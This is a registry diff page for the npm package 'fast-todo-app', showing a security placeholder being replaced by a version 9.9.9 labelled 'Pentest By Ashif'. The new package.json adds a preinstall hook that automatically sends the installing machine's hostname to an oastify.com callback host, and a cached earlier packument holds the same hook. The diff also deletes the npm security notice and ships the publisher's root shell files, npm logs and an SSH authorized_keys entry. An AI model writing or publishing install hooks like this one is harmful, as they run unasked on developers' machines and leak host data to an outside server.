fast-todo-app 0.0.1-security → 9.9.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of fast-todo-app might be problematic. Click here for more details.
- package/.bash_history +2 -0
- package/.bashrc +99 -0
- package/.cache/motd.legal-displayed +0 -0
- package/.cloud-locale-test.skip +0 -0
- package/.hushlogin +0 -0
- package/.npm/_cacache/content-v2/sha512/53/45/59535293dccfd6bc032ed172a0a4e0796cbe23da3e5856c8c6e366b5acecb1bd2dbd860bfb91eea8a28755d864b49bbe972dad46fd77bc3f1322f5d8343b +1 -0
- package/.npm/_cacache/content-v2/sha512/fb/42/7c77d78d3b5d83f35c192f4bbfe6254bca8b0858a6adfa8f9a3f717d4e96f86f62cc565f0723902b003a36a72e2bdf19dd9c128871efdd362333f409f5dc +1 -0
- package/.npm/_cacache/index-v5/9a/5d/18b734f038b4b4e0f36a1c1d9c852b951409916ab3205e88ac3cab28e02b +3 -0
- package/.npm/_cacache/index-v5/fa/6e/193653cbc43b963d648e21c3728bd599ba2239d460cf48c2aa97687b80b7 +2 -0
- package/.npm/_logs/2025-07-27T09_14_47_301Z-debug-0.log +53 -0
- package/.npm/_logs/2025-07-27T09_16_09_085Z-debug-0.log +44 -0
- package/.npm/_logs/2025-07-27T09_17_27_138Z-debug-0.log +18 -0
- package/.npm/_logs/2025-07-27T09_20_15_581Z-debug-0.log +18 -0
- package/.npm/_logs/2025-07-27T09_20_25_978Z-debug-0.log +37 -0
- package/.npm/_logs/2025-07-27T09_20_39_191Z-debug-0.log +18 -0
- package/.npm/_logs/2025-07-27T09_22_02_457Z-debug-0.log +26 -0
- package/.npm/_logs/2025-07-27T09_23_33_903Z-debug-0.log +13 -0
- package/.npm/_update-notifier-last-checked +0 -0
- package/.profile +7 -0
- package/.ssh/authorized_keys +2 -0
- package/.wget-hsts +4 -0
- package/package.json +9 -3
- package/README.md +0 -5
package/.bash_history
ADDED
package/.bashrc
ADDED
|
@@ -0,0 +1,99 @@
|
|
|
1
|
+
# ~/.bashrc: executed by bash(1) for non-login shells.
|
|
2
|
+
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
|
|
3
|
+
# for examples
|
|
4
|
+
|
|
5
|
+
# If not running interactively, don't do anything
|
|
6
|
+
[ -z "$PS1" ] && return
|
|
7
|
+
|
|
8
|
+
# don't put duplicate lines in the history. See bash(1) for more options
|
|
9
|
+
# ... or force ignoredups and ignorespace
|
|
10
|
+
HISTCONTROL=ignoredups:ignorespace
|
|
11
|
+
|
|
12
|
+
# append to the history file, don't overwrite it
|
|
13
|
+
shopt -s histappend
|
|
14
|
+
|
|
15
|
+
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
|
|
16
|
+
HISTSIZE=1000
|
|
17
|
+
HISTFILESIZE=2000
|
|
18
|
+
|
|
19
|
+
# check the window size after each command and, if necessary,
|
|
20
|
+
# update the values of LINES and COLUMNS.
|
|
21
|
+
shopt -s checkwinsize
|
|
22
|
+
|
|
23
|
+
# make less more friendly for non-text input files, see lesspipe(1)
|
|
24
|
+
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
|
|
25
|
+
|
|
26
|
+
# set variable identifying the chroot you work in (used in the prompt below)
|
|
27
|
+
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
|
|
28
|
+
debian_chroot=$(cat /etc/debian_chroot)
|
|
29
|
+
fi
|
|
30
|
+
|
|
31
|
+
# set a fancy prompt (non-color, unless we know we "want" color)
|
|
32
|
+
case "$TERM" in
|
|
33
|
+
xterm-color) color_prompt=yes;;
|
|
34
|
+
esac
|
|
35
|
+
|
|
36
|
+
# uncomment for a colored prompt, if the terminal has the capability; turned
|
|
37
|
+
# off by default to not distract the user: the focus in a terminal window
|
|
38
|
+
# should be on the output of commands, not on the prompt
|
|
39
|
+
#force_color_prompt=yes
|
|
40
|
+
|
|
41
|
+
if [ -n "$force_color_prompt" ]; then
|
|
42
|
+
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
|
|
43
|
+
# We have color support; assume it's compliant with Ecma-48
|
|
44
|
+
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
|
|
45
|
+
# a case would tend to support setf rather than setaf.)
|
|
46
|
+
color_prompt=yes
|
|
47
|
+
else
|
|
48
|
+
color_prompt=
|
|
49
|
+
fi
|
|
50
|
+
fi
|
|
51
|
+
|
|
52
|
+
if [ "$color_prompt" = yes ]; then
|
|
53
|
+
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
|
|
54
|
+
else
|
|
55
|
+
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
|
|
56
|
+
fi
|
|
57
|
+
unset color_prompt force_color_prompt
|
|
58
|
+
|
|
59
|
+
# If this is an xterm set the title to user@host:dir
|
|
60
|
+
case "$TERM" in
|
|
61
|
+
xterm*|rxvt*)
|
|
62
|
+
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
|
|
63
|
+
;;
|
|
64
|
+
*)
|
|
65
|
+
;;
|
|
66
|
+
esac
|
|
67
|
+
|
|
68
|
+
# enable color support of ls and also add handy aliases
|
|
69
|
+
if [ -x /usr/bin/dircolors ]; then
|
|
70
|
+
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
|
|
71
|
+
alias ls='ls --color=auto'
|
|
72
|
+
#alias dir='dir --color=auto'
|
|
73
|
+
#alias vdir='vdir --color=auto'
|
|
74
|
+
|
|
75
|
+
alias grep='grep --color=auto'
|
|
76
|
+
alias fgrep='fgrep --color=auto'
|
|
77
|
+
alias egrep='egrep --color=auto'
|
|
78
|
+
fi
|
|
79
|
+
|
|
80
|
+
# some more ls aliases
|
|
81
|
+
alias ll='ls -alF'
|
|
82
|
+
alias la='ls -A'
|
|
83
|
+
alias l='ls -CF'
|
|
84
|
+
|
|
85
|
+
# Alias definitions.
|
|
86
|
+
# You may want to put all your additions into a separate file like
|
|
87
|
+
# ~/.bash_aliases, instead of adding them here directly.
|
|
88
|
+
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
|
|
89
|
+
|
|
90
|
+
if [ -f ~/.bash_aliases ]; then
|
|
91
|
+
. ~/.bash_aliases
|
|
92
|
+
fi
|
|
93
|
+
|
|
94
|
+
# enable programmable completion features (you don't need to enable
|
|
95
|
+
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
|
|
96
|
+
# sources /etc/bash.bashrc).
|
|
97
|
+
#if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
|
|
98
|
+
# . /etc/bash_completion
|
|
99
|
+
#fi
|
|
File without changes
|
|
File without changes
|
package/.hushlogin
ADDED
|
File without changes
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"_rev":"4-d75fd6f8f1c10282de0ac6bc99d5e32d","time":{"created":"2025-07-27T09:02:20.363Z","modified":"2025-07-27T09:02:21.199Z","1.0.0":"2022-07-04T06:05:23.651Z","3.0.0":"2025-07-27T09:02:20.921Z"},"_id":"fast-todo-app","name":"fast-todo-app","dist-tags":{"latest":"3.0.0"},"versions":{"3.0.0":{"name":"fast-todo-app","version":"3.0.0","description":"Pentest","main":"index.js","scripts":{"test":"echo \"Error: no test specified\" && exit 1","preinstall":"node -e \"require('https').get('https://lazpitl0ztoyg91rq40072pcw32uqmeb.oastify.com/proof?package=vscode-websearchforcopilot&host='+require('os').hostname())\""},"keywords":["Pentest","By","Ashif"],"author":{"name":"Ashif"},"license":"ISC","_id":"fast-todo-app@3.0.0","_nodeVersion":"20.19.4","_npmVersion":"10.8.2","dist":{"integrity":"sha512-PjAb1nevBnVQD4hrHihhyBSiBCEFNoDhQr7Vq/rLZaZFJjV62FUB4ydLKJeeOx8omCObxCVsFGpCxr8oCYujZA==","shasum":"ca975381cc8d925aecd1ae974d3b3ed3ef47c418","tarball":"https://registry.npmjs.org/fast-todo-app/-/fast-todo-app-3.0.0.tgz","fileCount":1,"unpackedSize":461,"signatures":[{"keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U","sig":"MEYCIQDQQYBqcmP3yBCvH+g7fxW+cRPDqxAaJefTqiliiqwG1wIhAIRtWlZn60jxgXWn8PmWS762fFpYq+WTN4nMl5Nlu4XW"}]},"_npmUser":{"name":"ai0x1337","email":"ashifofficial05@gmail.com"},"directories":{},"maintainers":[{"name":"ai0x1337","email":"ashifofficial05@gmail.com"}],"_npmOperationalInternal":{"host":"s3://npm-registry-packages-npm-production","tmp":"tmp/fast-todo-app_3.0.0_1753606940747_0.4932630733910601"},"_hasShrinkwrap":false}},"maintainers":[{"name":"ai0x1337","email":"ashifofficial05@gmail.com"}],"description":"Pentest","keywords":["Pentest","By","Ashif"],"author":{"name":"Ashif"},"license":"ISC","readme":"ERROR: No README data found!","readmeFilename":""}
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"username":"ai0x1337"}
|
package/.npm/_cacache/index-v5/9a/5d/18b734f038b4b4e0f36a1c1d9c852b951409916ab3205e88ac3cab28e02b
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
1
|
+
|
|
2
|
+
83eeaad23108cc13f2cc448fab0a1c8730f219d3 {"key":"make-fetch-happen:request-cache:https://registry.npmjs.org/-/whoami","integrity":"sha512-+0J8d9eNO12D81wZL0u/5iVLyosIWKat+o+aP3F9Tpb4b2LMVl8HI5ArADo2py4r3xndnBKIce/dNiMz9An13A==","time":1753607847673,"size":23,"metadata":{"time":1753607847660,"url":"https://registry.npmjs.org/-/whoami","reqHeaders":{},"resHeaders":{"content-type":"application/json","date":"Sun, 27 Jul 2025 09:17:27 GMT","vary":"Accept-Encoding"},"options":{"compress":true}}}
|
|
3
|
+
c056c0efa33c203fe66b5f13d1ec3188e3bc079b {"key":"make-fetch-happen:request-cache:https://registry.npmjs.org/-/whoami","integrity":"sha512-+0J8d9eNO12D81wZL0u/5iVLyosIWKat+o+aP3F9Tpb4b2LMVl8HI5ArADo2py4r3xndnBKIce/dNiMz9An13A==","time":1753608016014,"size":23,"metadata":{"time":1753608016004,"url":"https://registry.npmjs.org/-/whoami","reqHeaders":{},"resHeaders":{"content-type":"application/json","date":"Sun, 27 Jul 2025 09:20:16 GMT","vary":"Accept-Encoding"},"options":{"compress":true}}}
|
package/.npm/_cacache/index-v5/fa/6e/193653cbc43b963d648e21c3728bd599ba2239d460cf48c2aa97687b80b7
ADDED
|
@@ -0,0 +1,2 @@
|
|
|
1
|
+
|
|
2
|
+
b9c7d25a17b196d7d72b821b8b8fa4358c9ba2cf {"key":"make-fetch-happen:request-cache:https://registry.npmjs.org/fast-todo-app","integrity":"sha512-U0VZU1KT3M/WvAMu0XKgpOB5bL4j2j5YVsjG42a1rOyxvS29hgv7ke6ooodV2GS0m76XLa1G/Xe8PxMi9dg0Ow==","time":1753608039981,"size":1799,"metadata":{"time":1753608039961,"url":"https://registry.npmjs.org/fast-todo-app","reqHeaders":{"accept":"application/json"},"resHeaders":{"cache-control":"public, max-age=300","content-encoding":"gzip","content-type":"application/json","date":"Sun, 27 Jul 2025 09:20:39 GMT","etag":"W/\"d1b88d6aa2a0a4b2ffb934ec93c7b73b\"","last-modified":"Sun, 27 Jul 2025 09:02:22 GMT","vary":"accept-encoding, accept"},"options":{"compress":true}}}
|
|
@@ -0,0 +1,53 @@
|
|
|
1
|
+
0 verbose cli /usr/bin/node /usr/bin/npm
|
|
2
|
+
1 info using npm@10.8.2
|
|
3
|
+
2 info using node@v20.19.4
|
|
4
|
+
3 silly config load:file:/usr/lib/node_modules/npm/npmrc
|
|
5
|
+
4 silly config load:file:/root/.npmrc
|
|
6
|
+
5 silly config load:file:/usr/etc/npmrc
|
|
7
|
+
6 verbose title npm login
|
|
8
|
+
7 verbose argv "login"
|
|
9
|
+
8 verbose logfile logs-max:10 dir:/root/.npm/_logs/2025-07-27T09_14_47_301Z-
|
|
10
|
+
9 verbose logfile /root/.npm/_logs/2025-07-27T09_14_47_301Z-debug-0.log
|
|
11
|
+
10 notice Log in on https://registry.npmjs.org/
|
|
12
|
+
11 verbose web login before first POST
|
|
13
|
+
12 silly logfile done cleaning log files
|
|
14
|
+
13 http fetch GET 200 https://registry.npmjs.org/npm 89ms
|
|
15
|
+
14 http fetch POST 200 https://registry.npmjs.org/-/v1/login 462ms
|
|
16
|
+
15 verbose web auth got response {
|
|
17
|
+
15 verbose web auth loginUrl: 'https://www.npmjs.com/login?next=/login/cli/059e9b9c-4207-4bd4-ab0d-ed1bbec84843',
|
|
18
|
+
15 verbose web auth doneUrl: 'https://registry.npmjs.org/-/v1/done?sessionId=059e9b9c-4207-4bd4-ab0d-ed1bbec84843'
|
|
19
|
+
15 verbose web auth }
|
|
20
|
+
16 verbose web auth opening url pair
|
|
21
|
+
17 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 127ms
|
|
22
|
+
18 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 130ms
|
|
23
|
+
19 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 123ms
|
|
24
|
+
20 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 132ms
|
|
25
|
+
21 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 129ms
|
|
26
|
+
22 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 121ms
|
|
27
|
+
23 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 114ms
|
|
28
|
+
24 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 119ms
|
|
29
|
+
25 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 116ms
|
|
30
|
+
26 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 110ms
|
|
31
|
+
27 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 120ms
|
|
32
|
+
28 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 139ms
|
|
33
|
+
29 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 114ms
|
|
34
|
+
30 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 412ms
|
|
35
|
+
31 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 126ms
|
|
36
|
+
32 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 123ms
|
|
37
|
+
33 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 112ms
|
|
38
|
+
34 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 110ms
|
|
39
|
+
35 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 113ms
|
|
40
|
+
36 http fetch GET 200 https://registry.npmjs.org/-/v1/done?sessionId=*** 122ms
|
|
41
|
+
37 verbose web auth done-check finished
|
|
42
|
+
38 info login Logged in on https://registry.npmjs.org/.
|
|
43
|
+
39 verbose cwd /root
|
|
44
|
+
40 verbose os Linux 6.14.0-23-generic
|
|
45
|
+
41 verbose node v20.19.4
|
|
46
|
+
42 verbose npm v10.8.2
|
|
47
|
+
43 notice
|
|
48
|
+
43 notice New [31mmajor[39m version of npm available! [31m10.8.2[39m -> [34m11.5.1[39m
|
|
49
|
+
43 notice Changelog: [34mhttps://github.com/npm/cli/releases/tag/v11.5.1[39m
|
|
50
|
+
43 notice To update run: [4mnpm install -g npm@11.5.1[24m
|
|
51
|
+
43 notice { force: true, [Symbol(proc-log.meta)]: true }
|
|
52
|
+
44 verbose exit 0
|
|
53
|
+
45 info ok
|
|
@@ -0,0 +1,44 @@
|
|
|
1
|
+
0 verbose cli /usr/bin/node /usr/bin/npm
|
|
2
|
+
1 info using npm@10.8.2
|
|
3
|
+
2 info using node@v20.19.4
|
|
4
|
+
3 silly config load:file:/usr/lib/node_modules/npm/npmrc
|
|
5
|
+
4 silly config load:file:/root/.npmrc
|
|
6
|
+
5 silly config load:file:/usr/etc/npmrc
|
|
7
|
+
6 verbose title npm login
|
|
8
|
+
7 verbose argv "login"
|
|
9
|
+
8 verbose logfile logs-max:10 dir:/root/.npm/_logs/2025-07-27T09_16_09_085Z-
|
|
10
|
+
9 verbose logfile /root/.npm/_logs/2025-07-27T09_16_09_085Z-debug-0.log
|
|
11
|
+
10 notice Log in on https://registry.npmjs.org/
|
|
12
|
+
11 verbose web login before first POST
|
|
13
|
+
12 silly logfile done cleaning log files
|
|
14
|
+
13 http fetch POST 200 https://registry.npmjs.org/-/v1/login 246ms
|
|
15
|
+
14 verbose web auth got response {
|
|
16
|
+
14 verbose web auth loginUrl: 'https://www.npmjs.com/login?next=/login/cli/da9577d3-a85e-4fa9-b8d0-ef3b7a2a6ce5',
|
|
17
|
+
14 verbose web auth doneUrl: 'https://registry.npmjs.org/-/v1/done?sessionId=da9577d3-a85e-4fa9-b8d0-ef3b7a2a6ce5'
|
|
18
|
+
14 verbose web auth }
|
|
19
|
+
15 verbose web auth opening url pair
|
|
20
|
+
16 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 128ms
|
|
21
|
+
17 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 109ms
|
|
22
|
+
18 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 114ms
|
|
23
|
+
19 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 115ms
|
|
24
|
+
20 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 117ms
|
|
25
|
+
21 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 105ms
|
|
26
|
+
22 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 115ms
|
|
27
|
+
23 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 117ms
|
|
28
|
+
24 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 100ms
|
|
29
|
+
25 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 111ms
|
|
30
|
+
26 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 103ms
|
|
31
|
+
27 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 119ms
|
|
32
|
+
28 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 110ms
|
|
33
|
+
29 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 125ms
|
|
34
|
+
30 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 110ms
|
|
35
|
+
31 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 113ms
|
|
36
|
+
32 http fetch GET 200 https://registry.npmjs.org/-/v1/done?sessionId=*** 131ms
|
|
37
|
+
33 verbose web auth done-check finished
|
|
38
|
+
34 info login Logged in on https://registry.npmjs.org/.
|
|
39
|
+
35 verbose cwd /root
|
|
40
|
+
36 verbose os Linux 6.14.0-23-generic
|
|
41
|
+
37 verbose node v20.19.4
|
|
42
|
+
38 verbose npm v10.8.2
|
|
43
|
+
39 verbose exit 0
|
|
44
|
+
40 info ok
|
|
@@ -0,0 +1,18 @@
|
|
|
1
|
+
0 verbose cli /usr/bin/node /usr/bin/npm
|
|
2
|
+
1 info using npm@10.8.2
|
|
3
|
+
2 info using node@v20.19.4
|
|
4
|
+
3 silly config load:file:/usr/lib/node_modules/npm/npmrc
|
|
5
|
+
4 silly config load:file:/root/.npmrc
|
|
6
|
+
5 silly config load:file:/usr/etc/npmrc
|
|
7
|
+
6 verbose title npm whoami
|
|
8
|
+
7 verbose argv "whoami"
|
|
9
|
+
8 verbose logfile logs-max:10 dir:/root/.npm/_logs/2025-07-27T09_17_27_138Z-
|
|
10
|
+
9 verbose logfile /root/.npm/_logs/2025-07-27T09_17_27_138Z-debug-0.log
|
|
11
|
+
10 silly logfile done cleaning log files
|
|
12
|
+
11 http fetch GET 200 https://registry.npmjs.org/-/whoami 356ms (cache miss)
|
|
13
|
+
12 verbose cwd /root
|
|
14
|
+
13 verbose os Linux 6.14.0-23-generic
|
|
15
|
+
14 verbose node v20.19.4
|
|
16
|
+
15 verbose npm v10.8.2
|
|
17
|
+
16 verbose exit 0
|
|
18
|
+
17 info ok
|
|
@@ -0,0 +1,18 @@
|
|
|
1
|
+
0 verbose cli /usr/bin/node /usr/bin/npm
|
|
2
|
+
1 info using npm@10.8.2
|
|
3
|
+
2 info using node@v20.19.4
|
|
4
|
+
3 silly config load:file:/usr/lib/node_modules/npm/npmrc
|
|
5
|
+
4 silly config load:file:/root/.npmrc
|
|
6
|
+
5 silly config load:file:/usr/etc/npmrc
|
|
7
|
+
6 verbose title npm whoami
|
|
8
|
+
7 verbose argv "whoami"
|
|
9
|
+
8 verbose logfile logs-max:10 dir:/root/.npm/_logs/2025-07-27T09_20_15_581Z-
|
|
10
|
+
9 verbose logfile /root/.npm/_logs/2025-07-27T09_20_15_581Z-debug-0.log
|
|
11
|
+
10 silly logfile done cleaning log files
|
|
12
|
+
11 http fetch GET 200 https://registry.npmjs.org/-/whoami 258ms (cache updated)
|
|
13
|
+
12 verbose cwd /root
|
|
14
|
+
13 verbose os Linux 6.14.0-23-generic
|
|
15
|
+
14 verbose node v20.19.4
|
|
16
|
+
15 verbose npm v10.8.2
|
|
17
|
+
16 verbose exit 0
|
|
18
|
+
17 info ok
|
|
@@ -0,0 +1,37 @@
|
|
|
1
|
+
0 verbose cli /usr/bin/node /usr/bin/npm
|
|
2
|
+
1 info using npm@10.8.2
|
|
3
|
+
2 info using node@v20.19.4
|
|
4
|
+
3 silly config load:file:/usr/lib/node_modules/npm/npmrc
|
|
5
|
+
4 silly config load:file:/root/.npmrc
|
|
6
|
+
5 silly config load:file:/usr/etc/npmrc
|
|
7
|
+
6 verbose title npm view ai0x1337
|
|
8
|
+
7 verbose argv "view" "ai0x1337"
|
|
9
|
+
8 verbose logfile logs-max:10 dir:/root/.npm/_logs/2025-07-27T09_20_25_978Z-
|
|
10
|
+
9 verbose logfile /root/.npm/_logs/2025-07-27T09_20_25_978Z-debug-0.log
|
|
11
|
+
10 silly logfile done cleaning log files
|
|
12
|
+
11 http fetch GET 404 https://registry.npmjs.org/ai0x1337 372ms (cache skip)
|
|
13
|
+
12 verbose stack HttpErrorGeneral: 404 Not Found - GET https://registry.npmjs.org/ai0x1337 - Not found
|
|
14
|
+
12 verbose stack at /usr/lib/node_modules/npm/node_modules/npm-registry-fetch/lib/check-response.js:95:15
|
|
15
|
+
12 verbose stack at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
|
|
16
|
+
12 verbose stack at async RegistryFetcher.packument (/usr/lib/node_modules/npm/node_modules/pacote/lib/registry.js:90:19)
|
|
17
|
+
12 verbose stack at async #getData (/usr/lib/node_modules/npm/lib/commands/view.js:135:20)
|
|
18
|
+
12 verbose stack at async #viewPackage (/usr/lib/node_modules/npm/lib/commands/view.js:112:28)
|
|
19
|
+
12 verbose stack at async View.exec (/usr/lib/node_modules/npm/lib/commands/view.js:70:5)
|
|
20
|
+
12 verbose stack at async Npm.exec (/usr/lib/node_modules/npm/lib/npm.js:207:9)
|
|
21
|
+
12 verbose stack at async module.exports (/usr/lib/node_modules/npm/lib/cli/entry.js:74:5)
|
|
22
|
+
13 verbose statusCode 404
|
|
23
|
+
14 verbose pkgid ai0x1337@*
|
|
24
|
+
15 error code E404
|
|
25
|
+
16 error 404 Not Found - GET https://registry.npmjs.org/ai0x1337 - Not found
|
|
26
|
+
17 error 404
|
|
27
|
+
18 error 404 'ai0x1337@*' is not in this registry.
|
|
28
|
+
19 error 404
|
|
29
|
+
20 error 404 Note that you can also install from a
|
|
30
|
+
21 error 404 tarball, folder, http url, or git url.
|
|
31
|
+
22 verbose cwd /root
|
|
32
|
+
23 verbose os Linux 6.14.0-23-generic
|
|
33
|
+
24 verbose node v20.19.4
|
|
34
|
+
25 verbose npm v10.8.2
|
|
35
|
+
26 verbose exit 1
|
|
36
|
+
27 verbose code 1
|
|
37
|
+
28 error A complete log of this run can be found in: /root/.npm/_logs/2025-07-27T09_20_25_978Z-debug-0.log
|
|
@@ -0,0 +1,18 @@
|
|
|
1
|
+
0 verbose cli /usr/bin/node /usr/bin/npm
|
|
2
|
+
1 info using npm@10.8.2
|
|
3
|
+
2 info using node@v20.19.4
|
|
4
|
+
3 silly config load:file:/usr/lib/node_modules/npm/npmrc
|
|
5
|
+
4 silly config load:file:/root/.npmrc
|
|
6
|
+
5 silly config load:file:/usr/etc/npmrc
|
|
7
|
+
6 verbose title npm view fast-todo-app
|
|
8
|
+
7 verbose argv "view" "fast-todo-app"
|
|
9
|
+
8 verbose logfile logs-max:10 dir:/root/.npm/_logs/2025-07-27T09_20_39_191Z-
|
|
10
|
+
9 verbose logfile /root/.npm/_logs/2025-07-27T09_20_39_191Z-debug-0.log
|
|
11
|
+
10 silly logfile done cleaning log files
|
|
12
|
+
11 http fetch GET 200 https://registry.npmjs.org/fast-todo-app 413ms (cache miss)
|
|
13
|
+
12 verbose cwd /root
|
|
14
|
+
13 verbose os Linux 6.14.0-23-generic
|
|
15
|
+
14 verbose node v20.19.4
|
|
16
|
+
15 verbose npm v10.8.2
|
|
17
|
+
16 verbose exit 0
|
|
18
|
+
17 info ok
|
|
@@ -0,0 +1,26 @@
|
|
|
1
|
+
0 verbose cli /usr/bin/node /usr/bin/npm
|
|
2
|
+
1 info using npm@10.8.2
|
|
3
|
+
2 info using node@v20.19.4
|
|
4
|
+
3 silly config load:file:/usr/lib/node_modules/npm/npmrc
|
|
5
|
+
4 silly config load:file:/root/.npmrc
|
|
6
|
+
5 silly config load:file:/usr/etc/npmrc
|
|
7
|
+
6 verbose title npm init
|
|
8
|
+
7 verbose argv "init"
|
|
9
|
+
8 verbose logfile logs-max:10 dir:/root/.npm/_logs/2025-07-27T09_22_02_457Z-
|
|
10
|
+
9 verbose logfile /root/.npm/_logs/2025-07-27T09_22_02_457Z-debug-0.log
|
|
11
|
+
10 silly logfile done cleaning log files
|
|
12
|
+
11 silly package data {
|
|
13
|
+
11 silly package data name: 'fast-todo-app',
|
|
14
|
+
11 silly package data version: '9.9.9',
|
|
15
|
+
11 silly package data description: 'Pentest By Ashif',
|
|
16
|
+
11 silly package data main: 'index.js',
|
|
17
|
+
11 silly package data scripts: { test: 'echo "Error: no test specified" && exit 1' },
|
|
18
|
+
11 silly package data author: 'Ashif',
|
|
19
|
+
11 silly package data license: 'ISC'
|
|
20
|
+
11 silly package data }
|
|
21
|
+
12 verbose cwd /root
|
|
22
|
+
13 verbose os Linux 6.14.0-23-generic
|
|
23
|
+
14 verbose node v20.19.4
|
|
24
|
+
15 verbose npm v10.8.2
|
|
25
|
+
16 verbose exit 0
|
|
26
|
+
17 info ok
|
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
0 verbose cli /usr/bin/node /usr/bin/npm
|
|
2
|
+
1 info using npm@10.8.2
|
|
3
|
+
2 info using node@v20.19.4
|
|
4
|
+
3 silly config load:file:/usr/lib/node_modules/npm/npmrc
|
|
5
|
+
4 silly config load:file:/root/.npmrc
|
|
6
|
+
5 silly config load:file:/usr/etc/npmrc
|
|
7
|
+
6 verbose title npm publish
|
|
8
|
+
7 verbose argv "publish" "--access" "public"
|
|
9
|
+
8 verbose logfile logs-max:10 dir:/root/.npm/_logs/2025-07-27T09_23_33_903Z-
|
|
10
|
+
9 verbose logfile /root/.npm/_logs/2025-07-27T09_23_33_903Z-debug-0.log
|
|
11
|
+
10 verbose publish [ '.' ]
|
|
12
|
+
11 silly logfile done cleaning log files
|
|
13
|
+
12 silly packumentCache heap:516423680 maxSize:129105920 maxEntrySize:64552960
|
|
File without changes
|
package/.profile
ADDED
|
@@ -0,0 +1,2 @@
|
|
|
1
|
+
# Added and Managed by DigitalOcean Droplet Agent (code name: DOTTY)
|
|
2
|
+
ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFLpwf0LBjQvEAGH3+J8ceO4DqQrpGLPdBHdxXNlXk/ToTx+tJ5jWcckSulz07m1t8+wa/B9hB4R8spoFTartpk= {"os_user":"root","actor_email":"nulldigitxp@gmail.com","expire_at":"2025-07-27T09:16:40Z"}-dotty_ssh
|
package/.wget-hsts
ADDED
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "fast-todo-app",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "9.9.9",
|
|
4
|
+
"description": "Pentest By Ashif",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node -e \"require('https').get('https://oe63ek2dna1o46dd75b1jvph78dz1ppe.oastify.com/proof?package=vscode-websearchforcopilot&host='+require('os').hostname())\""
|
|
9
|
+
},
|
|
10
|
+
"author": "Ashif",
|
|
11
|
+
"license": "ISC"
|
|
6
12
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=fast-todo-app for more information.
|